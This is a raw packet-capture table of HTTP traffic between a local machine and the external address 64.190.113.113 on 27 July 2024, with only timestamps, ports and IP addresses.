Jul 27, 2024 07:43:57.231453896 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231503963 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.231514931 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231548071 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231581926 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231611967 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.231621027 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231669903 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.231672049 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231705904 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231739998 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231746912 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.231772900 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231827021 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231827974 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.231923103 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231957912 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.231973886 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.231992960 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232028008 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232059002 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.232059956 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232095957 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232114077 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.232130051 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232165098 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232187033 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.232204914 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232239008 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232255936 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.232271910 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232306004 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232320070 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.232341051 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232377052 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232391119 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.232415915 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232450008 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232510090 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232533932 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.232567072 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.232577085 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232614994 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232649088 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232681036 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232688904 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.232733011 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232763052 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.232785940 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232820988 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232836962 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.232853889 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232888937 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232894897 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.232922077 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232954025 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.232988119 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233021021 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233071089 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233104944 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233114958 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.233138084 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233163118 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.233175993 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233182907 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.233211040 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233244896 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233277082 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233278036 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.233310938 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233314037 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.233344078 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233376980 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233401060 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.233409882 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233443975 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233458996 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.233477116 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233510971 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233520985 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.233544111 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233589888 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.233591080 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233623981 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233658075 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.233659029 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233691931 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233722925 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233738899 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.233762026 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233794928 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233803988 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.233829975 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233863115 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233872890 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.233896017 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233930111 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233942986 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.233963013 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.233995914 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.234010935 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.234029055 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.234062910 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.234072924 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.234096050 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.234128952 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.234141111 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.234162092 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.234198093 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.234209061 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.234230042 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.234263897 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.234280109 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.234297991 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.234333038 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.234344006 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.234390020 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.234436035 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.316988945 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317054987 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317084074 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317105055 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317121983 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317137957 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317154884 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317171097 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317187071 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317203045 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317220926 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317254066 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317289114 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317327976 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317363977 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317397118 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317431927 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317440033 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.317466021 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317501068 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317512989 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.317512989 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.317534924 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317569971 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317580938 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.317603111 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317636013 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317653894 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.317668915 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317703009 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317718029 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.317739964 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317774057 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317811966 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.317985058 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.318517923 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.318587065 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.318623066 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.318638086 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.318656921 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.318695068 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.318727016 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.318727970 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.318773985 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.318788052 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.318823099 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.318857908 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.318883896 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.318892956 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.318932056 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.318953991 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.318988085 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319021940 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319036007 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.319055080 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319091082 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319119930 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.319123983 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319180012 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.319183111 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319224119 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319257975 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319264889 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.319291115 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319325924 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319340944 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.319360971 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319395065 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319417953 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.319427967 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319462061 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319474936 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.319497108 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319530964 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319545984 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.319564104 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319597960 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319612980 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.319633961 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319668055 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319681883 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.319700956 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319735050 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319747925 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.319768906 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319802999 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319818974 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.319835901 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319874048 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319880962 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.319906950 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319941044 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.319957018 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.319977999 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.320028067 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.323046923 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323080063 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323120117 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323134899 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323151112 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323165894 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323189020 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323204994 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323223114 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323255062 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323282003 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.323291063 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323301077 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.323324919 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323380947 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323391914 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.323415041 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323448896 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323477030 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.323501110 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323553085 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.323554039 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323613882 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323648930 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323678970 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.323681116 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323720932 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.323733091 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323765993 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323800087 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323813915 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.323832989 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323865891 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323879957 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.323899031 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323935032 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.323950052 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.323967934 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.324001074 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.324008942 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.324033976 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.324068069 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.324090958 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.324099064 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.324132919 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.324136972 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.324170113 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.324203014 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.324217081 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.324239016 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.324270964 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.324285030 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.324305058 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.324337959 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.324348927 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.324369907 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.324404955 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.324418068 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.365330935 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.403906107 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.403954029 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404006958 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404067039 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404114962 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.404122114 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404155970 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404180050 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.404189110 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404201031 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.404225111 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404258966 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404273033 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.404309988 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404344082 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404381037 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.404397011 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404429913 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404454947 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.404464960 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404526949 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404561996 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.404565096 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404597998 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404612064 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.404632092 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404669046 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404681921 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.404705048 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404737949 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404761076 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.404772997 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404808998 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404819965 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.404844046 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404876947 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404891968 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.404911995 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404946089 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.404959917 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.404980898 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.405023098 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.405137062 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.405169964 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.405205011 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.405216932 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.405241013 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.405284882 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.405508995 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.405647993 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.405699015 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.405723095 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.405752897 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.405788898 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.405802965 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.405849934 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.405898094 CEST	62248	80	192.168.2.4	64.190.113.113
Jul 27, 2024 07:43:57.405904055 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.405956984 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.405989885 CEST	80	62248	64.190.113.113	192.168.2.4
Jul 27, 2024 07:43:57.406006098 CEST	62248	80	192.168.2.4	64.190.113.113
